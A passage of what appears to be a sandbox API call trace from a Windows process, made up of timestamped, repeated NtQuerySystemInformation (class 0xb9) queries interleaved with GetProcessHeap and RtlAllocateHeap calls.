SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.261] GetProcessHeap () returned 0x27fc8db0000 [0187.261] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc98743c0 [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.264] GetProcessHeap () returned 0x27fc8db0000 [0187.264] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x4a) returned 0x27fc8e53670 [0187.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.266] GetProcessHeap () returned 0x27fc8db0000 [0187.266] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc98731d0 [0187.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.269] GetProcessHeap () returned 0x27fc8db0000 [0187.269] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x4c) returned 0x27fc8e53370 [0187.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.272] GetProcessHeap () returned 0x27fc8db0000 [0187.272] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc9872830 [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.276] GetProcessHeap () returned 0x27fc8db0000 [0187.276] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc98728a0 [0187.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.279] GetProcessHeap () returned 0x27fc8db0000 [0187.279] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x2c) returned 0x27fc8e5b240 [0187.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.281] GetProcessHeap () returned 0x27fc8db0000 [0187.282] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc9872ad0 [0187.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 